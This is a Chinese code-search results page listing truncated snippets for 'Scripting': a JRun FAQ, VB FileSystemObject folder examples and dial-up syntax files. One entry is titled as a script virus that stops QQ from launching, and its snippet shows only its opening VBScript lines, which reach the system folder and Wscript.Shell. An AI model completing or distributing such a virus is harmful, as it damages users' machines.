代码搜索:Scripting
找到约 2,777 项符合「Scripting」的源代码
代码结果 2,777
www.eeworm.com/read/245113/12820060
txt jrun常见问题回答 (jrun 中文 faq).txt
作者:jeru
email: jeru@163.net
日期:2000-12-31 12:15:46
JRun常见问题回答
什么是并发(Concurrency)?
并发指JRun在同一时间运行多个servlet的能力。JRun通过运用Java内建的多线程能力支持并发。多任务或多处理(Multi-tasking or Multi-processing)是并发的其他说法。该功能赋
www.eeworm.com/read/243994/12901082
bas module1.bas
Attribute VB_Name = "Module1"
Public Function FindFolder(FolderName As String) As Boolean
'查找文件夹,并且在没有的情况下创建文件夹
'创建fso对象模型
' 由于fso对象包含在scripting 类型库 (scrrun.dll)中,所以在使用前首先需要在在工程中引用这个文件,单击“工程”
www.eeworm.com/read/243761/12919018
txt 一个让qq不能启动的脚本病毒 .txt
原代码
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
Set r=CreateObject("Wscript.Shell")
s
www.eeworm.com/read/243682/12924963
txt dunscript.txt
/L20"Dial-Up Scripting" Nocase Line Comment = ; Escape Char = \ String Chars = "' File Extensions = scp
/Delimiters = ~!@%^&*()-+=|\/{}[]:;"' , .?
/Function String = "%[a-zA-Z_]*)"
/C1"Keywords"
www.eeworm.com/read/243682/12925296
txt dialupscripting.txt
/L20"Dial-Up Scripting" Nocase Line Comment = ; Escape Char = \ String Chars = "' File Extensions = scp
/Delimiters = ~!@%^&*()-+=|\/{}[]:;"' , .?
/Function String = "%[a-z_]*)"
/C1"Keywords"
an
www.eeworm.com/read/242302/13078232
txt 如何在客户机上建立服务器上的一个共享的文件目录.txt
下 面 为 我 写 的 一 小 段 程 序 , 相 信 对 你 有 一 定 帮 助 。
Dim fso, d
dim newfolder as string
On Error Resume Next '//////如 已 经 建 立 则 忽 略 错 误
Set fso = CreateObject("Scripting.FileSy
www.eeworm.com/read/242302/13078282
txt 如何获取某个文件夹的大小.txt
没 有 这 样 的 API, 但 可 以 使 用 FileSystemObject来 实 现 , 如 :
Dim fso As FileSystemObject
Dim f As Folder
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.Get
www.eeworm.com/read/242302/13078496
txt 通过局域网copy东西,但不知网络路径怎么写.txt
网络路径就是UNC格式,即:\\计算机名\路径。但是需要注意的是使用FileSystemObject拷贝网络目录时有点怪,如果要拷贝网络上的一个共享目录,需要这么做:
Dim fs
Set fs = CreateObject("Scripting.FileSystemObject")
' 把myFolder下的所有子目录拷贝到myNewFolder